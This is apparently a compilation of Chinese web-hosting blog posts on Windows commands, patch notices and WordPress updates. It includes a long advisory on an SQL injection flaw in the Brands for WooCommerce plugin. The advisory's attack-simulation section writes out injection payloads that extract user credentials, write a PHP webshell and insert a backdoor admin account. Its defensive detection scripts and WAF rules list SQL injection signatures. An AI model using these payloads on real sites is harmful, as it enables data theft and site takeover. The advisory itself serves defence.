-p ----15秒关机 rsop.msc-------组策略结果集 rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen----启动一个空白的Windows 图片和传真查看器 secpol.msc--------本地安全策略 services.msc---本地服务设置 sfc /scannow-----启动系统文件检查器 sndrec32-------录音机 taskmgr-----任务管理器(适用于2000/xp/2003) tsshutdn-------60秒倒计时关机命令 winchat--------XP自带局域网聊天 winmsd---------系统信息 winver-----显示About Windows 窗口 wupdmgr-----------Windows Update #### Windows远程桌面服务远程代码执行漏洞高危预警! 漏洞背景: 2019年5月14日微软官方发布安全补丁,其中Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),威胁程度较高,影响范围极广。建议用户立即进行补丁更新! 受影响的版本: Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP Windows 8和Windows 10及之后版本的用户不受此漏洞影响。 修复建议: 1.对于Windows Server 2008的用户,及时登录服务器安装最新安全补丁,建议Windows Update设置为自动更新。(默认我司云服务器Windows Update已设置为自动更新,请登录服务器核实CVE-2019-0708是否安装成功,如没有务必马上安装!) 2.对于Windows 2003的用户,建议更换为Windows Server2008或以上操作系统版本! 微软官方公告链接: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 #### windows默认ie浏览器怎么关闭增强安全模式 要在Windows中关闭“IE增强的安全配置”,您需要通过“服务器管理器”进行修改。解释与详细步骤:“IE增强的安全配置”是Windows Server中的一项默认安全设置,旨在减少Internet Explorer上的安全风险。但是,在某些情境下,例如在受信任的内部网络上,这些增强的安全配置可能会过于限制,导致某些网站或应用无法正常运行。因此,很多用户或管理员会选择关闭它。 1.打开服务器管理器 2.点击本地服务器 3.点击 IE增强的安全配置 启动 4.关闭启动 #### WinMTR工具下载 分析跟踪检测网络路由状态 输入域名或者IP,点击start按钮开始执行 参数解释: Loss:丢失率 Sent:发包数 Recv:接收数 Best:最快响应时间 Avrg:平均响应时间 Worst:最差响应时间 Last:最后响应时间 主要看Loss、Best、Avrg、Worst 这几个参数。比如上图以百度为例,Loss为100的基本可以忽略,这是获取不到路由数据,所以是100%,主要看其他路由Best、Avrg数据,基本上一百以内是正常的,另外看最后一条路由ip是不是域名指向的ip,如果不是则说明有问题。 示例二: 如上图所示,虽然看上去丢包率很高,但看后面的路由发送的数据包都接收到了,说明链路正常,有些路由有imcp包保护,所以出现丢包率高,实际正常,一百多的响应值是因为这个ip是美国的,物理位置的原因所以响应时间一般在200毫秒左右。 总结:一般只看Sent、Recv数值,发送和接收数据基本相等,说明路由数据包传输正常,其次看Best、Avrg、Worst数据,一般响应时间在100以内是正常的。如果丢包率很高,响应时间很大,可以看看前后是那个路由ip,在网上可以 查询此IP的归属地,基本可以判断出是那个地方网络存在延迟。   #### WinRAR 曝出代码执行漏洞,请赶紧升级! 作为享誉全球的装机必备工具,「压缩软件」这四个字基本可以认为是 WinRAR 的专有名字了。只要有 PC 的地方,几乎都能看到 WinRAR 的身影。不过这款软件最近却被曝出了一个有 19 年历史的代码执行漏洞。WinRAR 宣称在全球拥有超过 5 亿的用户,目前看来,这些用户都将面临安全风险。 根据安全公司 Check Point 研究人员披露的细节,这个代码执行漏洞存在于第三方库 UNACEV2.DLL 中,它从 2005 年起就没有再更新过了。就连 WinRAR 开发者也无法访问该库的源代码,因此官方的修复方法是移除它,停止对 ACE 文档格式的支持。 由于 WinRAR 海量的用户群体,用户应该意识到恶意软件开发者很可能会利用此漏洞。而对于通过任何途径获取到的 ACE 文件,在使用 WinRAR 打开前请谨慎,除非已更新 WinRAR,否则不建议使用 WinRAR 打开。而公司的系统管理员也应警告员工,避免在未更新 WinRAR 的情况下打开这些文件。 研究人员在文中介绍了关于 WinRAR 代码执行漏洞的来龙去脉,他在 UNACEV2.DLL 的过滤函数中发现了一个漏洞,允许将代码提取到 Windows 启动文件夹,并在 Windows 重启之后执行。通俗来说,该漏洞使得攻击者可通过 WinRAR 绕过权限直接将恶意文件放进 Windows 系统的启动文件夹中。这就意味着当用户下次重新开机时,这些恶意文件就能自动运行,让攻击者“完全控制”受害者的计算机。 不过值得注意的是,如果现在访问 WinRAR 的官方网站,点击下载的依然是 5.61 版本,而该版本目前尚未修复这个代码执行漏洞。如果你经常使用这款压缩软件而且担心安全性方面的问题,建议通过下面的链接下载最新的 5.70 beta 1 版本,该版本已解决这个安全漏洞。 WinRAR 5.70 beta1 下载地址 https://www.win-rar.com/affdownload/download.php #### win域名服务国内或面临清退 最近有站长反馈自己注册的win域名在阿里云续不了费了,主机吧查询了下,发现各大域名注册商都不支持注册win域名了. 国内现有.win顶级域名也将转移到海外注册商。 根据《互联网域名管理办法》规定域名注册机构不得提供未经国家域名注册管理机构许可的顶级域名服务。而win未能获得许可,这也就导致国内无法注册和使用,有点类似于前几年CC域名一样,主机吧当时注册了.cc域名,并备案好了,结果.cc域名未获许可,导致一直没用,后来又获许可了。挺好的域名,就一直放着没用。 这里也给那些要买域名的同学提个醒,域名后缀还是买主流的好,比如com、cn、net,千万别买那些什么wang、top这类的非主流域名,指不定哪天域名又没获批准,让你把域名转移到海外去,海外的DNS慢得一批,根本无法使用。 #### WooCommerce品牌插件曝SQL注入漏洞,电商网站面临数据全盘泄露风险 漏洞紧急通告:电商网站的核心组件沦陷 漏洞编号:CNVD-2026-00106(对应CVE-2025-68519)危害等级:严重高危(影响机密性、完整性、可用性三重安全属性)影响范围:WordPress Brands for WooCommerce Plugin <= 3.8.6.3 所有版本漏洞类型:SQL注入漏洞公开时间:2026年1月5日攻击特点:远程攻击者无需身份验证即可利用该漏洞,直接操作数据库 插件功能与漏洞深度分析 Brands for WooCommerce插件核心作用 这是一个专门为WooCommerce电商网站设计的品牌管理插件,主要功能包括: 品牌分类管理:创建、编辑、删除产品品牌分类 品牌属性关联:将产品与品牌进行关联管理 品牌页面展示:生成独立的品牌展示页面 品牌筛选功能:在前端提供按品牌筛选产品的功能 SEO优化:为品牌页面优化搜索引擎表现 使用场景:全球数十万使用WooCommerce的电商网站,特别是多品牌零售商、品牌代理商、产品聚合平台。 SQL注入漏洞的技术本质 漏洞描述明确指出:“应用缺少对外部输入SQL语句的验证”。这意味着: 攻击原理: 输入点未过滤:插件在处理用户输入(如URL参数、表单数据)时,未进行严格的SQL特殊字符过滤 直接拼接SQL:将用户输入直接拼接到SQL查询语句中,未使用预编译语句 权限过高:插件使用的数据库账户权限可能过高,允许执行危险操作 可能受影响的输入点: 品牌ID参数(如?brand_id=1) 品牌名称搜索参数 品牌排序参数 品牌分页参数 AJAX请求中的品牌相关参数 漏洞危害的“三重威胁” 机密性影响(C):攻击者可读取数据库中的所有数据 - 客户信息:姓名、地址、电话、邮箱 - 订单数据:交易记录、支付信息、物流信息 - 商品数据:成本价、库存量、供应商信息 - 运营数据:销售统计、用户行为分析 完整性影响(I):攻击者可修改、删除数据 - 篡改商品价格:将所有商品改为1元 - 删除订单记录:清除交易证据 - 修改客户信息:导致发货错误 - 破坏品牌关联:使商品分类混乱 可用性影响(A):攻击者可破坏服务可用性 - 删除关键数据表:导致网站完全瘫痪 - 执行资源密集型操作:耗尽数据库资源 - 植入后门:长期控制数据库 攻击场景模拟:电商网站的“数据库沦陷日” 攻击步骤推演(基于典型SQL注入模式) 第一步:漏洞发现 攻击者通过以下方式识别目标: - 扫描WooCommerce网站特征 - 识别使用Brands for WooCommerce插件的网站 - 通过Google搜索:inurl:"/product-brand/" 第二步:注入点探测 尝试常见的SQL注入测试: https://target-store.com/?product_brand=1' AND '1'='1 https://target-store.com/?product_brand=1' AND SLEEP(5)-- https://target-store.com/wp-admin/admin-ajax.php?action=brands_filter&term=1' UNION SELECT... 第三步:数据提取 根据数据库类型构造注入Payload: # 提取数据库版本 1' UNION SELECT @@version,2,3-- # 提取所有表名 1' UNION SELECT table_name,2,3 FROM information_schema.tables-- # 提取用户表数据 1' UNION SELECT user_login,user_pass,user_email FROM wp_users-- # 提取订单数据 1' UNION SELECT order_id,customer_email,order_total FROM wp_orders-- 第四步:权限提升与持久化 # 尝试写入Webshell 1'; SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/html/shell.php'-- # 创建数据库后门用户 1'; INSERT INTO wp_users (user_login,user_pass) VALUES ('hacker',MD5('password'))-- 第五步:数据窃取与破坏 - 导出完整客户数据库(用于精准营销或诈骗) - 窃取支付凭证(如有存储) - 篡改商品价格(制造混乱) - 删除最近订单(破坏经营) 实际损失量化评估 假设一个中型电商网站: 日订单量:500单 注册客户:50,000人 商品SKU:10,000个 月交易额:300万元 数据泄露72小时内可能损失: 直接经济损失: 1. 数据恢复成本:专业团队介入,预计5-10万元 2. 订单损失:网站瘫痪24小时,损失订单约500单,约30万元 3. 客户赔付:按《个人信息保护法》可能面临人均500元赔偿,最高2500万元 4. 监管罚款:营业额5%罚款,约15万元/月 间接品牌损失: 1. 客户信任崩塌:客户流失率预计达40% 2. 支付通道风险:支付公司可能暂停合作 3. 供应商关系恶化:商品数据泄露影响供应链 4. 法律诉讼风险:集体诉讼可能性高 长期影响: 1. SEO排名下降:被标记为不安全网站 2. 恢复周期长:重建信任需要6-12个月 3. 保险费用上涨:网络安全保险费率大幅提升 紧急修复操作指南(黄金4小时应急响应) 第一阶段:立即检测与确认(30分钟) #!/bin/bash # 紧急检测脚本 check_brands_vulnerability.sh # 1. 确认插件存在 PLUGIN_DIR="/var/www/html/wp-content/plugins/brands-for-woocommerce" if [ ! -d "$PLUGIN_DIR" ]; then echo "✅ 未安装Brands for WooCommerce插件,不受影响" exit 0 fi # 2. 检查版本 VERSION_FILE="$PLUGIN_DIR/readme.txt" if [ -f "$VERSION_FILE" ]; then VERSION=$(grep -i "stable tag" "$VERSION_FILE" | awk '{print $NF}') echo "当前插件版本: $VERSION" # 版本比较(<= 3.8.6.3为受影响版本) if [[ "$VERSION" == "3.8.6.3" ]] || [[ "$VERSION" < "3.8.6.3" ]]; then echo "⚠️ ⚠️ ⚠️ 紧急:当前版本存在SQL注入漏洞!" echo "请立即执行修复措施" else echo "✅ 当前版本已修复该漏洞" fi fi # 3. 检查最近可疑访问日志 echo "=== 最近24小时可疑访问记录 ===" grep -i "brands" /var/log/nginx/access.log | grep -E "('|\"|%27|%22|union|select|sleep|benchmark)" | tail -20 # 4. 检查数据库异常查询 echo "=== 数据库当前活跃查询 ===" mysql -u root -p -e "SHOW FULL PROCESSLIST;" | grep -i "select\|union\|sleep" | head -10 第二阶段:紧急修复措施(必须2小时内完成) 方案A:立即升级到安全版本(强烈推荐) 1. 登录WordPress后台 → 插件 → 已安装插件 2. 找到“Brands for WooCommerce” 3. 如果有“立即更新”按钮,直接点击更新 4. 如果无更新按钮,手动操作: a. 下载最新版:https://wordpress.org/plugins/brands-for-woocommerce/ b. 备份当前插件:cd wp-content/plugins && tar -czf brands-backup-$(date +%Y%m%d).tar.gz brands-for-woocommerce/ c. 删除旧版本:rm -rf brands-for-woocommerce d. 上传并解压新版本 e. 重新激活插件 方案B:临时禁用插件(如无法立即升级) # 如果不立即需要品牌功能: 1. 后台停用插件 2. 重命名插件目录以防被利用: cd /wp-content/plugins mv brands-for-woocommerce brands-for-woocommerce_DISABLED_$(date +%Y%m%d) 3. 通知团队: - 商品分类功能暂时受影响 - 品牌筛选功能暂时不可用 - 准备替代方案(如使用WooCommerce原生分类) # 如果必须保持功能运行: 1. 配置WAF紧急规则(见下文) 2. 密切监控所有品牌相关请求 3. 安排立即升级时间窗口 第三阶段:修复验证与数据检查(1小时) <?php // 验证脚本:test_brands_security.php require_once('wp-load.php'); // 测试可能的注入点 $test_cases = [ [ 'url' => home_url('/?product_brand=1%27%20OR%20%271%27%3D%271'), 'expected' => '没有找到有效防御' // 如果返回正常页面,说明漏洞存在 ], [ 'url' => home_url('/product-brand/test/?filter=1%27%20AND%20SLEEP%285%29'), 'expected_time' => 5 // 如果请求耗时5秒,说明SQL注入成功 ] ]; foreach ($test_cases as $test) { $start = microtime(true); $response = wp_remote_get($test['url'], ['timeout' => 10]); $time = microtime(true) - $start; if (isset($test['expected_time']) && $time > $test['expected_time']) { error_log("安全验证失败:{$test['url']} 触发时间延迟攻击"); } $body = wp_remote_retrieve_body($response); if (strpos($body, 'SQL syntax') !== false || strpos($body, 'database error') !== false) { error_log("安全验证失败:{$test['url']} 返回数据库错误信息"); } } // 检查数据库是否有异常数据 global $wpdb; $suspicious_records = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}users WHERE user_registered > DATE_SUB(NOW(), INTERVAL 2 DAY) AND user_login LIKE '%admin%' OR user_login LIKE '%hacker%'" ); if (!empty($suspicious_records)) { error_log("发现可疑用户账户:" . json_encode($suspicious_records)); } ?> 第四阶段:事后追溯与影响评估 -- 检查是否有数据被异常访问 -- 1. 检查最近的数据查询模式 SELECT DATE(timestamp) as date, COUNT(*) as query_count, GROUP_CONCAT(DISTINCT SUBSTRING_INDEX(argument, ' ', 2)) as query_types FROM mysql.general_log WHERE argument LIKE '%wp_brands%' OR argument LIKE '%product_brand%' AND event_time > DATE_SUB(NOW(), INTERVAL 7 DAY) GROUP BY date ORDER BY date DESC; -- 2. 检查是否有异常用户 SELECT * FROM wp_users WHERE user_registered > DATE_SUB(NOW(), INTERVAL 3 DAY) ORDER BY ID DESC LIMIT 20; -- 3. 检查订单数据完整性 SELECT DATE(post_date) as order_date, COUNT(*) as order_count, SUM(meta_value) as total_amount FROM wp_posts p JOIN wp_postmeta pm ON p.ID = pm.post_id WHERE p.post_type = 'shop_order' AND pm.meta_key = '_order_total' AND p.post_date > DATE_SUB(NOW(), INTERVAL 30 DAY) GROUP BY order_date ORDER BY order_date DESC; WAF紧急防护配置:在修复前的关键屏障 百度云防护WAF专项规则配置 规则一:SQL注入特征拦截(紧急) 规则名称:SQL注入紧急拦截规则 匹配条件: - URI Path 包含 "/product-brand/" - 或 Query String 包含 "product_brand" - 或 Query String 包含 "brands" - 且 请求内容 包含多值之一 [ "' OR '1'='1", "UNION SELECT", "SLEEP(", "BENCHMARK(", "EXTRACTVALUE(", "UPDATEXML(", "CONCAT(", "-- ", "#", "/*", "*/", "@@version", "information_schema" ] 处置动作:拦截 生效范围:作用于整个防护站点 优先级:最高 规则说明:拦截所有SQL注入特征请求,覆盖常见注入手法 规则二:品牌相关参数严格过滤 规则名称:品牌参数输入验证 匹配条件: - Query String Parameter [名称为"brand_id"] 存在 - 或 Query String Parameter [名称为"filter"] 存在 - 或 Query String Parameter [名称为"term"] 存在 输入验证条件: - 参数值必须为纯数字(正则:^[0-9]+$) - 参数值长度小于10 - 参数值不包含SQL关键字 验证失败动作:拦截 规则三:异常访问行为检测 规则名称:品牌页面异常访问检测 匹配条件: - URI Path 包含 "brand" 或 "商标" 或 "品牌" 统计维度: - 统计信息1:IP(基础频率控制) - 统计信息2:User-Agent + IP(设备级控制) - 统计信息3:Query String Parameter [名称为"brand_id"](参数遍历检测) 统计设置: - 时长:60秒 - IP阈值:100次 - UA+IP阈值:50次 - 参数值阈值:30个不同值 处置动作:JS挑战 → 拦截(渐进式) 规则四:保护管理后台操作 规则名称:品牌管理后台防护 匹配条件: - URI Path 包含 "/wp-admin/" - 且 URI Path 包含 "brand" - 且 Referer 不包含本站域名 # 防止CSRF - 且 HTTP Method 等于 "POST" # 重点关注数据修改操作 统计信息:IP + Cookie组合 统计时长:10秒 阈值:5次 # 10秒内5次品牌管理操作异常 处置动作:拦截 为什么WAF在此刻至关重要? 修复空窗期防护:从发现漏洞到完成修复通常需要数小时,WAF提供即时防护 零日攻击防御:即使攻击者使用未知的注入手法,WAF可基于行为特征识别 业务连续性保障:无需关闭网站即可防护,避免业务中断损失 攻击取证分析:完整记录攻击尝试,为法律追责提供证据 误伤可控:相比直接修改代码,WAF规则可灵活调整,避免误伤正常用户 主机帮电商安全解决方案推荐 1. 【百度云防护WAF企业版】- 电商专属防护 适用场景:中大型电商平台,需要高级防护能力 BOT管理:识别并拦截恶意爬虫、价格抓取工具 API安全:保护WooCommerce REST API,防止数据泄露 业务逻辑防护:防止订单欺诈、库存篡改、价格篡改 AI智能防护:基于机器学习识别新型SQL注入手法 划块验证:对可疑请求进行高级验证码挑战 2. 【高防IP+高防服务器】- 基础架构保障 适用场景:电商大促期间,防止DDoS攻击导致网站瘫痪 超大流量清洗:抵御针对商品页、抢购页的流量攻击 连接数防护:防止恶意请求耗尽服务器连接池 源站隐藏:真实服务器IP不暴露,防止直接攻击 BGP智能调度:确保全球客户访问速度和稳定性 3. 【SSL证书+HTTPS全站加密】- 支付安全基础 适用场景:保护交易数据、客户隐私信息 EV SSL证书:显示绿色地址栏,提升客户信任度 PCI DSS合规:满足支付卡行业数据安全标准 HTTP/2支持:提升页面加载速度,改善用户体验 混合内容修复:确保全站资源均通过HTTPS加载 4. 【电商安全全托管服务】- 一站式解决方案 适用场景:缺乏专业安全团队的电商企业 定期安全扫描:每周自动检测插件、主题、核心漏洞 实时威胁监控:7×24小时安全事件监控与响应 应急响应服务:出现安全事件时30分钟内响应 合规咨询:协助满足GDPR、个人信息保护法等要求 员工培训:电商团队安全意识与操作培训 长期安全加固策略 代码安全开发规范 输入验证原则:所有用户输入都视为不可信,必须验证 参数化查询:使用预编译语句(Prepared Statements)处理数据库操作 最小权限原则:插件使用独立的数据库账户,仅授予必要权限 错误信息处理:生产环境关闭详细错误信息,防止信息泄露 插件管理制度 来源控制:只从WordPress官方插件库安装 定期更新:设置插件自动更新,或每周手动检查更新 数量控制:只安装必要的插件,定期清理不用的插件 安全审计:新安装插件前进行基本安全审查 数据安全策略 数据分类:对客户数据、订单数据、商品数据进行分类保护 访问控制:严格限制数据库访问权限和IP白名单 加密存储:敏感信息(如客户手机号)加密存储 定期备份:每日数据库备份,备份文件加密存储 监控与应急响应 实时监控:监控数据库异常查询、异常用户行为 日志审计:完整记录所有数据访问日志,保留至少180天 应急演练:每季度进行安全应急演练 第三方审计:每年进行一次第三方安全审计 结语:电商安全是商业成功的基石 Brands for WooCommerce插件的SQL注入漏洞事件,给所有电商从业者敲响了警钟: 电商网站不仅仅是展示商品的平台,更是承载客户信任、交易安全和商业机密的数字资产。一次数据泄露不仅导致直接经济损失,更可能摧毁多年建立的品牌信誉。 给电商运营者的核心建议: 立即行动:所有使用该插件的电商网站必须在24小时内完成修复验证 全面检查:检查所有WooCommerce相关插件的安全状态 专业防护:考虑部署专业的WAF防护,特别是处理支付交易的网站 建立流程:建立标准化的插件更新和安全响应流程 特别提醒中小电商:可能没有专业的安全团队,但通过选择合适的云安全服务,可以以可控的成本获得企业级的安全防护。在电商竞争日益激烈的今天,安全不是成本,而是核心竞争力。 主机帮为电商客户提供:专属的电商安全解决方案,包括WooCommerce专项防护规则、大促期间安全护航、支付安全合规咨询等服务。我们理解电商业务的特殊性,提供7×24小时电商安全监控,确保您的在线业务安全稳定运行。 #### WordPress 5.3.1自动更新失败 手动更新解决办法 WordPress作为全球最受欢迎的开源程序由于种种原因国内访问官网一直很垃圾,虽然有中文版,但是并没有中文官网,经常性访问不了,不仅插件经常性更新失败,而版本更新也经常失败。 比如这次主机吧更新WordPress 5.3.1就出现了安装失败,其根本原因是国内网络根本访问不了wordpress.org。 Notice: 发生了预料之外的错误。WordPress.org或是此服务器的配置可能出了一些问题。如果您持续遇到困难,请试试支持论坛。 (WordPress无法建立到WordPress.org的安全连接,请联系您的服务器管理员。) in /www/wwwroot/zhujib.com/wp-admin/includes/update.php on line 139 正在从https://downloads.wordpress.org/release/zh_CN/wordpress-5.3.1.zip下载更新… 下载失败。: Too Many Requests 安装失败 解决办法只能手动更新了,下载WordPress 5.3.1 到本地电脑。 1.把WordPress 5.3.1压缩包的里的wp-content目录删掉   2.进FTP或主机管理后台删除根目录下的wp-includes和wp-admin文件夹。 3.上传删除后的压缩包到网站服务器上并覆盖现有的WordPress 文件 4.在浏览器里面运行:https://你的博客地址/wp-admin/upgrade.php,回车访问,执行升级,点击继续升级数据库,升级完成即可。     #### WordPress 5.3.2官方下载地址和国内下载地址 WordPress官网屏蔽掉国内访问已经很久了,直接就导致了使用国内主机的WordPress一直无法自动更新升级版本,比如今天更新的WordPress 5.3.2,估计今天很多人是没办法更新的。 想要更新只能手动更新了,直接官网下载吧。 官方下载地址https://cn.wordpress.org/wordpress-5.3.2-zh_CN.tar.gz 这个地址也是屏蔽掉国内访问的,要解决下载问题只能用海外VPS或云服务器下载了,像主机吧下载都是用美国服务器下载的。如果你没有,可以直接下载主机吧本地上传的版本。 地址:https://zhujib.com/wordpress-5.3.2-zh_CN.tar.gz 也可以给网站使用百度云加速CDN进行更新,因为百度云加速是有海外节点的,所以是可以自动更新WordPress最新版的,比如主机吧某演示站,今早就自动更新了最新版。     #### WordPress 5.4发布:界面更简洁 国内下载地址 4月1日 消息:WordPress官方宣布,WordPress 5. 4 正式版于 3 月 31 日正式面向公众发布,这是其2020 年度的第一个主要版本,并进行一些重大改进。 据悉,WordPress 5. 4 通过添加新功能和扩展现有块来对古腾堡编辑器(Gutenberg)进行了升级,新版提供更多让页面更生动的方式,速度也大幅度的提升,对于开发人员也有一些重要的变化。下面我们来了解官方对WordPress 5. 4 新体验的相关介绍: 两个新区块及更佳的区块整体使用体验 两个全新区块包括社交网络服务图标和按钮区块能轻松快速建立互动功能。同时支持变更色彩新方式,按钮及封面区块加入渐变色功能,富文本区块工具栏提供色彩设定的功能,群组及列区块亦首次提供色彩设定。 此外,5. 4 版简化了每个区块中插入及替换多媒体内容的流程,现在大多数区块都有了相同的操作方式。该版本还支持媒体及文字区块中的图片链接至其他内容。 新版本还提供更简洁的用户界面、导航栏及选项卡。 其中,区块导航标记提供更简洁的区块导航方式,让用户更容易选取区块。编辑器载入时间提升了14%,可供输入时间加速51%。在视觉方面,用户可以立即看出目前处在区块的编辑模式或导航模式。 WordPress 5. 4 对隐私方面功能进行了提升。现在个人资料导出结果会包含用户会话信息以及来自社群活动收集的用户位置数据。此外亦会显示目录。用户可通过隐私工具查看处理导出及抹除数据要求的进度。 新版本针对开发者将原生自定义字段加入菜单项目,两个全新动作能让开发者新增自定义字段至菜单项目中,无需插件也无需编写自定义walker。 出上述内容之外,WordPress 5. 4 还有更简化的样式、全新的API及嵌入内容。其中,用户可以依需求为区块设定样式;在嵌入中,区块编辑器现已支持TikTok,并不再支持CollegeHumor等等。 关于WordPress 5.4更多信息可前往官网页面了解。 国内用户可能下载不了,主机吧本地下载好了,大家可以去下载:https://zhujib.com/wordpress54guoneixiazaidizhi.html #### wordpress 5.5.3–zh_CN中文版最新下载地址 中文版的wordpress 5.5.3–zh_CN终于更新了,主机吧一度以为官方是要放弃中文市场了,因为5.5英文版更新很久了,但是中文版一直没有更新,中间间隔差不多有一年有了。 主机吧一度放弃了,打算一直用5.4了,结果11月27号的时候更新中文版了。主机吧更新后发现好像就多了个插件开启是否自动更新功能,其它的没什么变化,而且这个功能放在国内用那就是鸡肋,要知道国内连接wordpress一直不好,插件也经常更新了。总之能更新最新版就更新最版吧,毕竟安全些。记得更新之前做好文件和数据库备份。 考虑到国内有些地方下载不了官方地址,所以主机吧帮大家下载下来了,有需要的可以看下。   #### WordPress 5.6.1中文版发布 国内下载地址 WordPress 5.6.1中文发布啦 该维护版本具有 20个错误修复以及为块编辑器修复的7个问题。这些错误会影响WordPress 5.6版,因此您需要升级。 您可以 直接下载WordPress 5.6.1,或访问 仪表板→更新 屏幕,然后单击 立即更新。如果您的站点支持自动后台更新,则它们已经开始了更新过程。 WordPress 5.6.1是一个短周期的维护版本。下一个主要版本将是 5.7版。 官方下载地址比较慢,一些同学可能下载升级苦难,这里主机吧下载到百度网盘提供大家下载。   #### WordPress 5.6中文版下载地址 自从WordPress恢复中文版更新后,WordPress中文版几乎跟英文版更新同步了,这不5.6中文版来了。 这次升级有点高级,主机吧从旧版本升级过来可能会出现一些问题,所以大家在升级之前要先做好备份,别像主机吧一样,啥也没备份就升级了。   #### WordPress 5.7.2中文版更新下载 WordPress 5.7.2中文安全版本于2021年5月13日发布更新了啦。 此安全版本具有一个安全修复程序。因为这是一个安全版本,所以建议您立即更新站点。自WordPress 3.7以来的所有版本也已更新。 WordPress 5.7.2是一个短周期的安全版本。下一个主要版本将是5.8版。 您可以通过从WordPress.org下载更新到WordPress 5.7.2,或访问仪表板→更新,然后单击立即更新。 如果您的站点支持自动后台更新,则它们已经开始更新过程。 安全更新 一个安全问题会影响WordPress 3.7和5.7之间的版本。如果您尚未更新到5.7,则自3.7以来的所有WordPress版本也已更新,可以解决以下安全问题: PHPMailer,CVE-2020-36326和CVE-2018-19296中的对象注入。     #### WordPress 5.8.3_zh_CN发布 中文下载 此安全版本具有四个安全修复程序。 由于这是一个安全版本,因此建议您立即更新您的站点。 自 WordPress 3.7 以来的所有版本也已更新。 WordPress 5.8.3 是一个短周期安全版本。 下一个主要版本将是 版本 版本 5.9 ,该 已经处于候选发布阶段。 您可以通过从 WordPress.org 下载或访问您的仪表板 → 更新并单击立即更新来更新到 WordPress 5.8.3。 如果您的网站支持自动后台更新,则它们已经开始更新过程。 安全更新 有四个安全问题会影响 WordPress 3.7 和 5.8 之间的版本。 如果您还没有更新到 5.8,自 3.7 以来的所有 WordPress 版本也已更新以修复以下安全问题(除非另有说明): 向 SonarSource 的 Karim El Ouerghemmi 和 Simon Scannell 表示 支持 ,他们通过 post slug 披露了存储型 XSS 的问题。支持 Simon Scannell SonarSource 的 报告一些多站点安装中的对象注入问题。来自 ngocnb 和 khuyenn GiaoHangTietKiem JSC 的 与 Trend Micro Zero Day Initiative 合作报告 WP_Query 中的 SQL 注入漏洞的道具。来自 WordPress 安全团队的 Ben Bidner 报告了 WP_Meta_Query 中的 SQL 注入漏洞(仅与版本 4.1-5.8 相关)。 #### WordPress 5.9_zh_CN更新 百度网盘下载 1月27日 消息:WordPress官方宣布WordPress 5.9 Josephine 正式发布,该版本以著名的国际爵士歌手 Joséphine Baker 的名字命名,用户可以下载或者在站点仪表盘中直接更新。 根据官方介绍,作为一名终身的民权运动者, Joséphine 相信所有人都能够和谐相处,就像爵士乐队中不同的乐器融合在一起能组成一首完整的乐曲一样。 打开你最喜欢的音乐服务,在探索新版 WordPress 功能的同时,欣赏 Joséphine 著名的 You are the greatest love、Sans Amour 和 Love is a Dreamer。 #### WordPress 6.2.1更新 wordpress-6.2.1-zh_CN中文下载 WordPress 6.2 包含超过 292 项功能增强及 394 项错误修复。 此页面重点介绍了自 2022 年 11 月后 WordPress 6.1 发布的新功能。 从快速摘要到开发者资源,都可在这里找到。 通过站点编辑器预览并编辑您的站点 更新后的界面让您可以更便捷地控制站点编辑体验。 浏览模板和模板组件的完整预览,后从选定的任何位置开始编辑站点。 使用导航区块以更多方式管理站点菜单 A new sidebar experience makes it easier to edit your site’s navigation. Add, remove, and reorder menu items faster—no matter how complex your menus are. Discover a smoother experience for the Block Inserter A refreshed design gives you more visibility and easier access to the content you need. Use the Media tab to drag and drop content from your existing Media Library quickly. Find patterns faster with a split view that lets you navigate categories and see previews all at once. Find the controls you want when you need them Your block settings sidebar is better organized with tabs for Settings and Styles. So the tools you need are easy to identify and access. Build faster with headers and footers for block themes Discover a new collection of header and footer patterns to choose from. Use them with any block theme as a quick, high-quality starting point for your site’s templates. Explore Openverse media right from the Editor Openverse’s library catalogs over 600 million free, openly licensed stock images and audio—and now it’s directly integrated into the Editor. Focus on writing with Distraction Free mode For those times you want to be alone with your ideas. You can now hide all your panels and controls, leaving you free to bring your content to life. Experience the Site Editor, now out of beta Stable and ready for you to dive in and explore: 6.2 is your personal invitation to discover what the next generation of WordPress—and Block themes—can do. Style Book Use the new Style Book to get a complete overview of how every block in your site’s library looks. All in one place, all at a glance. Copy and paste styles Perfect the design on one type of block, then copy and paste those styles to other blocks to get just the look you want. 自定义CSS Power up your site any way you wish. Add CSS to your site, or your blocks, for another level of control over your site’s look and feel. Sticky positioning Choose to keep top-level group blocks fixed to the top of a page as visitors scroll. Importing widgets Options to import your favorite widgets from Classic themes to Block themes. Local fonts in themes Default WordPress themes offer better privacy with Google Fonts now included. #### WordPress 6.3.1更新 wordpress-6.3.1-zh_CN下载 维护更新 6.3.1版本修复了10个问题。 欲了解更多,参见发行注记。 欢迎使用 WordPress 6.3.1 比以往更高效地创建美观且引人注目的网站。无论您是想在无需编码的情况下构建整个网站,还是希望自定义每个细节的开发人员,WordPress 6.3 都能满足您的需求。 在站点编辑器中执行所有操作 WordPress 6.3 首次将您的内容、模板和模式整合到站点编辑器中。添加页面、浏览样式变化、创建同步模式,并享受对导航菜单的微调控制。不再浪费时间在不同的站点区域之间切换 - 现在您可以专注于最重要的事情。从创作到完成,一切都在一处完成。 创建并同步模式 排列区块不再受到限制,并可以将多个区块存储为可在网站中重复使用的区块版面配置。您甚至可以指定是否同步您的模式(以前​​称为“可重用块”),以便一项更改适用于站点的所有部分。或者,利用模式作为起点,并能够自定义每个实例。 使用命令面板更快地工作 切换到特定模板或使用新工具打开编辑器首选项,帮助您快速导航扩展功能。使用简单的键盘快捷键(Mac 上的 ⌘+k 或 Windows 上的 Ctrl+k),单击站点视图中的侧边栏搜索图标,或单击标题栏,即可在几秒钟内到达您需要去的地方并完成您需要做的事情。 使用新工具锐化您的设计 新的设计控件为微调设计带来了更多的多功能性,首先是无需编码即可从样式界面自定义标题样式的能力。您可以在支持的块的样式中管理双色调过滤器,并从主题提供的选项中进行选择或完全禁用它们。封面区块添加了文本颜色、布局控件和边框选项的设置,使这个功能强大的区块更加方便。 通过样式修订跟踪设计变更 您现在可以查看您的网站在特定时间的外观。在时间轴中可视化这些修订并访问一键选项来恢复以前的样式。 使用脚注区块进行注释 脚注在整个内容中添加方便的注释。现在您可以为任何段落添加和链接脚注。 使用详细信息区块显示或隐藏内容 使用该区块可以避免破坏惊喜,创建交互式问答部分,或在标题下隐藏长段落。 